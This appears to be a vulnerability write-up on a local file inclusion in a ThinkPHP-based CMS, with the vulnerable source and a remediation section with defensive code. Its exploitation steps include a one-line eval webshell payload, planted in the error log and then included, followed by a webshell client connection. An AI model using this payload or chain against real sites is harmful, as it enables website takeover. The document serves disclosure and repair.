Cool cms local file inclusion leads to getwebshell (ThinkPHP)

Source: Internet
Author: User

A local file inclusion lets you getwebshell and directly take control of the entire website. Vulnerable file: core\Lib\Action\Home\MyAction.class.php

    <?php
    class MyAction extends HomeAction {
        public function index() {
            $this->show();
        }
        public function show() {
            $id = !empty($_GET['id']) ? $_GET['id'] : 'hot';
            $this->display('My_' . trim($id)); // vulnerability
        }
    }
    ?>

The include happens in fetch():

    public function fetch($templateFile = '', $charset = '', $contentType = 'text/html', $display = false) {
        $GLOBALS['_viewStartTime'] = microtime(TRUE);
        if (null === $templateFile)
            // a null template name means: return directly without any output
            return;
        if (empty($charset)) $charset = C('DEFAULT_CHARSET');
        // page character encoding
        header("Content-Type:" . $contentType . "; charset=" . $charset);
        header("Cache-control: private"); // allow the page to be navigated back to
        // page cache
        ob_start();
        ob_implicit_flush(0);
        if (!file_exists_case($templateFile))
            // automatically locate the template file
            // key function: it only resolves the template file to be included; we look at it next
            $templateFile = $this->parseTemplateFile($templateFile);
        $engine = strtolower(C('TMPL_ENGINE_TYPE'));
        if ('php' == $engine) {
            // extract the template variable array into independent variables
            extract($this->tVar, EXTR_OVERWRITE);
            // load the PHP template directly
            include $templateFile;
        } elseif ('think' == $engine && $this->checkCache($templateFile)) {
            // Think template engine with a valid cache:
            // extract the variables and load the cached template
            extract($this->tVar, EXTR_OVERWRITE);
            // load the template cache file
            include C('CACHE_PATH') . md5($templateFile) . C('TMPL_CACHFILE_SUFFIX');
        } else {
            // the template file needs to be recompiled; third-party template engines are supported
            // call the template engine to parse and output
            $className = 'Template' . ucwords($engine);
            require_cache(THINK_PATH . '/Lib/Think/Util/Template/' . $className . '.class.php');
            $tpl = new $className;
            $tpl->fetch($templateFile, $this->tVar, $charset);
        }
        $this->templateFile = $templateFile;
        // get and clear the output buffer
        $content = ob_get_clean();
        // template content replacement
        $content = $this->templateContentReplace($content);
        // layout template parsing
        $content = $this->layout($content, $charset, $contentType);
        // output the template file
        return $this->output($content, $display);
    }

How the name of the included file is processed:

    private function parseTemplateFile($templateFile) {
        if ('' == $templateFile) {
            // empty template file name: locate it according to the default rules
            $templateFile = C('TMPL_FILE_NAME');
        } elseif (strpos($templateFile, '@')) {
            // operation template of another theme; must contain the module name, for example blue@User:add
            $templateFile = TMPL_PATH . str_replace(array('@', ':'), '/', $templateFile) . C('TMPL_TEMPLATE_SUFFIX');
        } elseif (strpos($templateFile, ':')) {
            // operation template of another module
            $templateFile = TEMPLATE_PATH . '/' . str_replace(':', '/', $templateFile) . C('TMPL_TEMPLATE_SUFFIX');
        } elseif (!is_file($templateFile)) {
            // another operation template of the current module
            $templateFile = dirname(C('TMPL_FILE_NAME')) . '/' . $templateFile . C('TMPL_TEMPLATE_SUFFIX');
        }
        if (!file_exists_case($templateFile))
            throw_exception(L('_TEMPLATE_NOT_EXIST_') . '[' . $templateFile . ']');
        return $templateFile;
    }

With the inclusion point in hand, we need a file that contains our malicious code. We use ThinkPHP's error logging for this.

Trigger an error:

Log file:

Use the two features mentioned above (1. include any file; 2. errors are written to the log) and 3. combine them with ThinkPHP template syntax to construct a one-line shell: {~eval($_POST[x])}

Write the one-liner by triggering an error:

Log file:

Include the log file containing the one-liner:

Chopper ("Kitchen Knife") connection:


Solution: To repair the program, secondary developers should make sure the template parameter is never user-controllable. On the ThinkPHP side, the processing of template file names and paths must be improved.
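One way to apply both halves of this fix, as an added example that is not Cool cms or ThinkPHP code: the action maps `id` onto a fixed allowlist, and a resolved template path is accepted only if it stays under the template root. The helper names, the allowlist entries other than `hot`, the `.html` suffix and the demo directory layout are assumptions.

```php
<?php
// Added example, not Cool cms or ThinkPHP code. The allowlist entries other
// than 'hot' and both helper names are assumptions made for illustration.

// Application side: map the request value onto a fixed set of template ids.
// In show() this would be: $this->display('My_' . safeTemplateId($_GET['id']));
// guarded by isset(), as in the original action.
function safeTemplateId($raw, array $allowed = array('hot', 'new', 'top')) {
    $id = is_string($raw) ? trim($raw) : '';
    // Strict comparison against known ids; anything else gets the default.
    return in_array($id, $allowed, true) ? $id : 'hot';
}

// Framework side: accept a resolved template only if it really lives under
// the template root and carries the expected template suffix.
function confineTemplatePath($file, $root, $suffix = '.html') {
    $realRoot = realpath($root);
    $realFile = realpath($file);           // false if the file does not exist
    if ($realRoot === false || $realFile === false) {
        return false;
    }
    $prefix = rtrim($realRoot, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($realFile, $prefix, strlen($prefix)) !== 0) {
        return false;                      // resolved outside the template root
    }
    if (substr($realFile, -strlen($suffix)) !== $suffix) {
        return false;                      // not a template file
    }
    return $realFile;
}

// Constructed demo: a temporary template root holding one template, plus a
// log file that sits outside that root.
$base = sys_get_temp_dir() . '/tpl_demo_' . uniqid();
mkdir($base . '/Tpl/My', 0700, true);
mkdir($base . '/Logs', 0700, true);
file_put_contents($base . '/Tpl/My/My_hot.html', 'hot list');
file_put_contents($base . '/Logs/app.log', 'log line');

foreach (array('hot', ' hot ', '../../Logs/app.log', array('x')) as $raw) {
    echo json_encode($raw), ' => ', safeTemplateId($raw), "\n";
}
// A template inside the root, then a path that climbs out of it to the log.
var_dump(confineTemplatePath($base . '/Tpl/My/My_hot.html', $base . '/Tpl') !== false);
var_dump(confineTemplatePath($base . '/Tpl/My/../../Logs/app.log', $base . '/Tpl'));
```

The allowlist alone closes this action; the path check is the defence in depth for any other caller that hands a request value to display() or fetch().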
